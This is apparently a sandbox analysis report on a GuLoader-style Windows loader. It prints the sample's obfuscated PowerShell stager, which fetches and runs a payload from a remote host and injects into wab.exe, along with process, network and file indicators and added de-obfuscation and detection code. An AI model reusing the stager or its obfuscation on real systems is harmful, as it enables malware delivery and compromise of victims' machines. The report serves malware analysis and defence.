'.ropSPrivt,ondaincorMi rtScor- ResSRteblS aseFor,eOp,lpRes Lip.4 ,il ');Unthrust (Antikvitetsforretnings ' tal$Ara gUnofl slaoNedkb ubaArvelAnte:linoRModte,olyc,itriFr.ttCapaebark= Gra( SheTVandeHu.dsUdfrt ,or-UnsiP ermavisstByelhHjer .nt$DecaO CripProlpElmir,nvlo SlabUntirBerriFedta Sprt SimeTangd,ifi)Gend ') ;Unthrust (Antikvitetsforretnings 'Ro,e$Spilg isjlPn.uo PrebOocya RevlAthl:PalmSSealafettpSlutrqu teLipomDomeivirgaRe,i1Dolo5Fler7Ra,n=emot$Brkeg NublMonaoCmrebSteaaBo glOver:C oiLDuk,aAasen VatdUndebD cirSpaduB.lmgS.iss Cazm PyosInstsPr,tilacigGutteUdsus ega+ Noe+T,bu%W ne$ Ri T Homanoncn Ma.d WanegrilmRo.fcNulpyB rokColoe cral ints,eso.Presc MitoBreauFlagnOvert F r ') ;$nucleli=$Tandemcykels[$Sapremia157];}$Hyacint=296268;$Shutterwise=28855;Unthrust (Antikvitetsforretnings 'Mast$GossgPoppl EndoimmabOpska,usel In,:AbraU lbid P sb N.nrSha eCh.mdCoareLuncs ou sge=Pret funkGUdd,eGrattOver-EnspC Arso BlonNasct Akae Klan watSa,t Fuzz$W,tcO.ocupundepDejlrSheaoPalebOsterBud.i.ispaForft FoseAcadd Fo ');Unthrust (Antikvitetsforretnings 'So,r$ MisgThrilTi so.prrbTrada aml.esk:ScypH Antnre.lsFl.geLin,a artvScenlS lkeSkvirFlgb Del=.mpe Sjle[GamoSBagay inisAccotDisseOrthmBa,y.RebuC,oneoA mrn astvJapaeg,rtrForutudre]Mirt: lo:Zo,aF D pr Mono.rotmJoveBProvaJa zs oite Bre6Be.l4InfaSSbeht AnerKooliov rnErytg R.d(Bril$MamlU BesdKes bSikkrEnc,e.ommd.arveMotisbagg),ndi ');Unthrust (Antikvitetsforretnings 'Ub.f$AnjagUmu,lrealoSkanbN tra re,lD kk:,ensEFrotr WelnArkaeNells QuatTraui D,snHov.eCam sBa.t Noe=Film Disr[SojaSOpskyMerlsUnfotNo,seG,ubmGuat.OyesTStdee Cr,xFordt dol.SvarEForln ColcDef,oKvetdHumbiSyltn WalgSe a]Klod:S rv:ProgALivsS venCAposIAnovIFilt.ScarGdokeeRespt .oaSModitSig,r illi kasn GlogLreb(Card$P,ncHD lanFor,scentePopuaSlusv usclDiskeLapirBal )Styr ');Unthrust (Antikvitetsforretnings 'Rumb$ RecgS,lvl PreoVarib N,paAnmelde,i:T.ttzAnthoSv.pb.verlTarde ,krn PlesHi,h=.alv$ UnmE,roorB,ndnRefreBn hsv,sttIndii ThenTe.lePinhsUrim.,ogfs Preu.hrebSporsSurrtSubsrReveiSignn 
z.ngUdsp(Fo,v$ diaHMessyTr.daOps,cAnslim stn eeltMart,Kont$ Fo.SOughhMit.uUntotFysitHat,eUnmorBu.lw FamiTutrsAdumePlan)Estr ');Unthrust $zoblens;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. 
g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. 
ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePanccMicruMilirK.umiWafft irtyArguPMortrpr goBecotCutao BlocBo uoEufolspri C.nc=.ldr Geni[Ret.NKl,ke ertpost.S raS nteeDmp cBayouRgrirColliMorttBibly TilPBis r humoVenttPrteo Q acF nkoBetllUterT RawyUnnepScraeGste]K nd: Rom:SkurTMar lHjems Gul1 Slu2P,as ');$nucleli=$Tandemcykels[0];$Akkompagnatr142= (Antikvitetsforretnings 'Skra$ Ky.g UnflKl bo,nhobTapaaRelalHexa:run.LAtteeDuchntrkas,ydfbBaana.efrr Dr oFanen ProeHaphr MonsAabe=hausNDgndeDankw .ur-KalkO,ehebKredjPr sePrimc TestNont CoedS SnoyHemisDis,tS beeTrkpmSwop.H,stNLadde AartUdle.TrykWNarse Sl,bHj.pCoverl UdliBeroe TvenGlutt');$Akkompagnatr142+=$Metalism[1];Unthrust ($Akkompagnatr142);Unthrust (Antikvitetsforretnings 'se,v$L tlLPsyceFoinnBuresParab Va,aBundr S aoJordnTaute,oler,leksRati.g zpH.illeGrnsaUnded NoneDe.prStems Lg.[Phyt$.sycT tonoForsrUndiuAfs mVelbsPreslFelteLovejCenolCardi FoegSa.ghErhve Le dForus O,e]Revo=Sama$OpbiASkranWhimt Svno U,cnakvaiIsthnUdd aSukks Fun ');$barser=Antikvitetsforretnings 'Elev$AfgiLEccle AponAntrsYpp.b StoaYardrKvleoBangnUnteeKedlr O.es Dob.Em lDFortoK plw .avnAn,alud,ao,ilkaspend.rifF Un.i nylKr,meAnsg(Fl g$ZealnEndruAlvec en,lCa eeCa.alAfhsiSpu,,unde$InteOTe,ipForupTr gr fusoFustbGeorrAr,eiPeriaDirkt Usue RhedI.fo)Nonu ';$Opprobriated=$Metalism[0];Unthrust (Antikvitetsforretnings 'Cohe$H,nkgChenl.paroDiabbelseaDyrelRema: TiqRResse.indcHyphi rketRothe Sno=B.ie(PladTsubieDiaksUnretGrun-DeflPRumlaanaltWenchS.mp Skol$ tr,OSuccppilopantirDemioSammb Pror ini NonaPseltUncoe Tvrd Non)Ax,l ');while (!$Recite) {Unthrust (Antikvitetsforretnings 'Pans$Bilpg AtalAddyoEp cbWalda enilT,eo: OliFGelioCheerAfhrmH.ndgTilriTrafvFun,eSjasrUndee elp=B sa$GodttSi.orBooguCitae Ele ') ;Unthrust $barser;Unthrust (Antikvitetsforretnings 
'.ropSPrivt,ondaincorMi rtScor- ResSRteblS aseFor,eOp,lpRes Lip.4 ,il ');Unthrust (Antikvitetsforretnings ' tal$Ara gUnofl slaoNedkb ubaArvelAnte:linoRModte,olyc,itriFr.ttCapaebark= Gra( SheTVandeHu.dsUdfrt ,or-UnsiP ermavisstByelhHjer .nt$DecaO CripProlpElmir,nvlo SlabUntirBerriFedta Sprt SimeTangd,ifi)Gend ') ;Unthrust (Antikvitetsforretnings 'Ro,e$Spilg isjlPn.uo PrebOocya RevlAthl:PalmSSealafettpSlutrqu teLipomDomeivirgaRe,i1Dolo5Fler7Ra,n=emot$Brkeg NublMonaoCmrebSteaaBo glOver:C oiLDuk,aAasen VatdUndebD cirSpaduB.lmgS.iss Cazm PyosInstsPr,tilacigGutteUdsus ega+ Noe+T,bu%W ne$ Ri T Homanoncn Ma.d WanegrilmRo.fcNulpyB rokColoe cral ints,eso.Presc MitoBreauFlagnOvert F r ') ;$nucleli=$Tandemcykels[$Sapremia157];}$Hyacint=296268;$Shutterwise=28855;Unthrust (Antikvitetsforretnings 'Mast$GossgPoppl EndoimmabOpska,usel In,:AbraU lbid P sb N.nrSha eCh.mdCoareLuncs ou sge=Pret funkGUdd,eGrattOver-EnspC Arso BlonNasct Akae Klan watSa,t Fuzz$W,tcO.ocupundepDejlrSheaoPalebOsterBud.i.ispaForft FoseAcadd Fo ');Unthrust (Antikvitetsforretnings 'So,r$ MisgThrilTi so.prrbTrada aml.esk:ScypH Antnre.lsFl.geLin,a artvScenlS lkeSkvirFlgb Del=.mpe Sjle[GamoSBagay inisAccotDisseOrthmBa,y.RebuC,oneoA mrn astvJapaeg,rtrForutudre]Mirt: lo:Zo,aF D pr Mono.rotmJoveBProvaJa zs oite Bre6Be.l4InfaSSbeht AnerKooliov rnErytg R.d(Bril$MamlU BesdKes bSikkrEnc,e.ommd.arveMotisbagg),ndi ');Unthrust (Antikvitetsforretnings 'Ub.f$AnjagUmu,lrealoSkanbN tra re,lD kk:,ensEFrotr WelnArkaeNells QuatTraui D,snHov.eCam sBa.t Noe=Film Disr[SojaSOpskyMerlsUnfotNo,seG,ubmGuat.OyesTStdee Cr,xFordt dol.SvarEForln ColcDef,oKvetdHumbiSyltn WalgSe a]Klod:S rv:ProgALivsS venCAposIAnovIFilt.ScarGdokeeRespt .oaSModitSig,r illi kasn GlogLreb(Card$P,ncHD lanFor,scentePopuaSlusv usclDiskeLapirBal )Styr ');Unthrust (Antikvitetsforretnings 'Rumb$ RecgS,lvl PreoVarib N,paAnmelde,i:T.ttzAnthoSv.pb.verlTarde ,krn PlesHi,h=.alv$ UnmE,roorB,ndnRefreBn hsv,sttIndii ThenTe.lePinhsUrim.,ogfs Preu.hrebSporsSurrtSubsrReveiSignn 
z.ngUdsp(Fo,v$ diaHMessyTr.daOps,cAnslim stn eeltMart,Kont$ Fo.SOughhMit.uUntotFysitHat,eUnmorBu.lw FamiTutrsAdumePlan)Estr ');Unthrust $zoblens;"
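The string literals handed to Antikvitetsforretnings in the script above follow a simple scheme: one real character every five, the other four are filler. The decoder below is an added example written for this page, not code from the report or from the sample; the stride of 5 and offset of 4 are inferred from the literals themselves (for instance the `User-Agent` string and the URL that resolves to econstramedia.com, the first host in the Network table below), because the body of the sample's own decoder function is not shown on this page. One caveat before relying on it: the literal that builds the `echo %appdata%\Coumarate.Bic` command does not decode cleanly from the text as printed here, most likely because runs of spaces were collapsed during extraction, so run the decoder over the original .bat, not over the report text.

```python
"""
De-obfuscator for the string scheme used by this sample's PowerShell stage.

Added example, not part of the sandbox report. Each literal passed to
Antikvitetsforretnings keeps positions 4, 9, 14, ... (0-based); stride 5 and
offset 4 are an inference from the literals on the page, not from the sample's
decoder function, whose body is not visible here.
"""
import re


def decode_every_nth(blob: str, stride: int = 5, offset: int = 4) -> str:
    """Keep one character every `stride` characters, starting at `offset`."""
    return blob[offset::stride]


# A PowerShell single-quoted literal: '' inside is an escaped single quote.
_CALL = re.compile(r"Antikvitetsforretnings\s+'((?:[^']|'')*)'")


def decode_script(text: str) -> list[str]:
    """Decode every Antikvitetsforretnings '...' call in a script fragment, in order."""
    return [decode_every_nth(m.group(1).replace("''", "'"))
            for m in _CALL.finditer(text)]


_URL = re.compile(r"https?://[^\s'\"<>]+")


def extract_urls(decoded: list[str]) -> list[str]:
    """Pull URLs out of the decoded strings (first-stage download locations)."""
    urls: list[str] = []
    for s in decoded:
        urls.extend(_URL.findall(s))
    return urls


# Literals copied verbatim from the script shown above (a fragment, not the whole stage).
SAMPLE = (
    "$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';"
    "$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s "
    "CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavn"
    "HilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';"
    "$Udarte=Antikvitetsforretnings 'Hytt>Sony ';"
    "$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';"
)

if __name__ == "__main__":
    for s in decode_script(SAMPLE):
        print(repr(s))
    print(extract_urls(decode_script(SAMPLE)))
```

Running it on the fragment yields `User-Agent `, the download URL on econstramedia.com, the `>` redirection operator and `iex` (Invoke-Expression), which is how the stage evaluates the next layer; keep the regex on the decoder's name from the specific sample, since GuLoader stagers rename it per build.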

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2236 -ip 2236

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 1724
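The process list above is the chain a detection should key on: a PowerShell host spawning cmd.exe only to echo a path under %APPDATA%, then launching the Windows Mail binary wab.exe with no arguments (the process the loader injects into), followed by wab.exe crashing into WerFault.exe. The hunting logic below is an added example, not part of the report; the event records are constructed in a Sysmon-like shape, the pids other than 2236 (the WerFault target shown above) are made up, and the parent-child links are an assumption drawn from the order of the process list, since the report itself shows only command lines.

```python
"""
Hunting rule for the PowerShell -> cmd.exe (echo %appdata%\...) -> wab.exe -> WerFault
chain seen in this detonation. Added example, not code from the report or the sample.
Event shape and parent links are constructed/assumed; only the command lines and the
WerFault target pid 2236 come from the report.
"""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def _basename(image: str) -> str:
    return ntpath.basename(image).lower()


def _ancestors(by_pid: dict[int, ProcEvent], pid: int):
    """Yield the parent chain starting at `pid`, stopping on unknown or cyclic pids."""
    seen: set[int] = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        yield by_pid[pid]
        pid = by_pid[pid].ppid


def _no_arguments(e: ProcEvent) -> bool:
    """True when the command line is nothing but the (optionally quoted) image path."""
    return e.cmdline.strip().strip('"').lower() == e.image.lower()


_APPDATA_PROBE = re.compile(r"echo\s+%appdata%\\", re.IGNORECASE)
_WER_TARGET = re.compile(r"(?<!\S)-p\s+(\d+)")  # "-p <pid>", not "-pss" or "-ip"


def find_guloader_chain(events: list[ProcEvent]) -> list[tuple[str, int]]:
    by_pid = {e.pid: e for e in events}
    findings: list[tuple[str, int]] = []
    hollowed: set[int] = set()
    for e in events:
        under_ps = any(_basename(a.image) == "powershell.exe"
                       for a in _ancestors(by_pid, e.ppid))
        name = _basename(e.image)
        if name == "wab.exe" and _no_arguments(e) and under_ps:
            findings.append(("wab_no_args_from_powershell", e.pid))
            hollowed.add(e.pid)
        elif name == "cmd.exe" and under_ps and _APPDATA_PROBE.search(e.cmdline):
            findings.append(("appdata_path_probe", e.pid))
    # A crash of the injected host is corroborating evidence, not a rule on its own.
    for e in events:
        if _basename(e.image) == "werfault.exe":
            m = _WER_TARGET.search(e.cmdline)
            if m and int(m.group(1)) in hollowed:
                hit = ("injected_host_crashed", int(m.group(1)))
                if hit not in findings:
                    findings.append(hit)
    return findings


# Constructed events modelled on the command lines in the report (pids/ppids assumed).
EVENTS = [
    ProcEvent(100, 90, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe <obfuscated stage, see script above>"),
    ProcEvent(101, 100, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"'),
    ProcEvent(2236, 100, r"C:\Program Files (x86)\windows mail\wab.exe",
              r'"C:\Program Files (x86)\windows mail\wab.exe"'),
    ProcEvent(300, 1, r"C:\Windows\SysWOW64\WerFault.exe",
              r"C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2236 -ip 2236"),
    ProcEvent(301, 1, r"C:\Windows\SysWOW64\WerFault.exe",
              r"C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 1724"),
    # Benign control: a user opening Windows Contacts from Explorer, also with no arguments.
    ProcEvent(400, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(401, 400, r"C:\Program Files (x86)\windows mail\wab.exe",
              r'"C:\Program Files (x86)\windows mail\wab.exe"'),
]

if __name__ == "__main__":
    for rule, pid in find_guloader_chain(EVENTS):
        print(f"{rule}: pid {pid}")
```

The argument-less wab.exe under a PowerShell ancestor is the strongest single signal; the `echo %appdata%\...` probe (the loader resolving where it dropped its payload file, here Coumarate.Bic in the Files section) and the WerFault crash of the same pid raise confidence but should not be required, since a successful injection does not always crash.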

Network

Country Destination Domain Proto
US 8.8.8.8:53 econstramedia.com udp
IN 103.211.216.55:443 econstramedia.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 55.216.211.103.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 tejarat-gram.com udp
IR 185.83.114.124:443 tejarat-gram.com tcp
US 8.8.8.8:53 dvcasha2.ocsp-certum.com udp
GB 2.17.209.123:80 dvcasha2.ocsp-certum.com tcp
US 8.8.8.8:53 146.209.17.2.in-addr.arpa udp
US 8.8.8.8:53 124.114.83.185.in-addr.arpa udp
US 8.8.8.8:53 123.209.17.2.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 45.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 203.33.253.131.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

memory/2888-2-0x00007FFB48023000-0x00007FFB48025000-memory.dmp

memory/2888-3-0x0000022B39C80000-0x0000022B39CA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qv5v52qj.hry.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2888-13-0x00007FFB48020000-0x00007FFB48AE1000-memory.dmp

memory/2888-14-0x00007FFB48020000-0x00007FFB48AE1000-memory.dmp

memory/1288-17-0x00000000745AE000-0x00000000745AF000-memory.dmp

memory/1288-18-0x00000000029B0000-0x00000000029E6000-memory.dmp

memory/1288-19-0x00000000745A0000-0x0000000074D50000-memory.dmp

memory/1288-20-0x00000000053D0000-0x00000000059F8000-memory.dmp

memory/1288-21-0x00000000745A0000-0x0000000074D50000-memory.dmp

memory/1288-22-0x0000000005330000-0x0000000005352000-memory.dmp

memory/1288-23-0x0000000005B00000-0x0000000005B66000-memory.dmp

memory/1288-24-0x0000000005B70000-0x0000000005BD6000-memory.dmp

memory/1288-30-0x0000000005CA0000-0x0000000005FF4000-memory.dmp

memory/1288-35-0x00000000062D0000-0x00000000062EE000-memory.dmp

memory/1288-36-0x00000000062F0000-0x000000000633C000-memory.dmp

memory/1288-37-0x0000000007BA0000-0x000000000821A000-memory.dmp

memory/1288-38-0x0000000006830000-0x000000000684A000-memory.dmp

memory/1288-39-0x00000000075C0000-0x0000000007656000-memory.dmp

memory/1288-40-0x0000000007520000-0x0000000007542000-memory.dmp

memory/1288-41-0x00000000087D0000-0x0000000008D74000-memory.dmp

C:\Users\Admin\AppData\Roaming\Coumarate.Bic

MD5 007cf6a92566beeac721341fb07ee93e
SHA1 8fcb0b9135d89b7cd0d038471bb901c20bee48b7
SHA256 362053d0e47717d018306ff0785c59415a2c7a72a44aa1140103efe093f584d8
SHA512 aad75aa8b7e967723996369c1d6ea0f3fced41b6748496b811024ce7202fab5839290b91222b4cad71d9db53f1efbeab851132823da710d6739297a21ad5cd41

memory/1288-43-0x0000000008D80000-0x000000000B640000-memory.dmp

memory/2888-44-0x00007FFB48023000-0x00007FFB48025000-memory.dmp

memory/2888-45-0x00007FFB48020000-0x00007FFB48AE1000-memory.dmp

memory/1288-53-0x00000000745AE000-0x00000000745AF000-memory.dmp

memory/1288-54-0x00000000745A0000-0x0000000074D50000-memory.dmp

memory/2236-55-0x00000000012D0000-0x0000000003B90000-memory.dmp

memory/1288-56-0x00000000745A0000-0x0000000074D50000-memory.dmp

memory/2888-59-0x00007FFB48020000-0x00007FFB48AE1000-memory.dmp

memory/2236-64-0x00000000012D0000-0x0000000003B90000-memory.dmp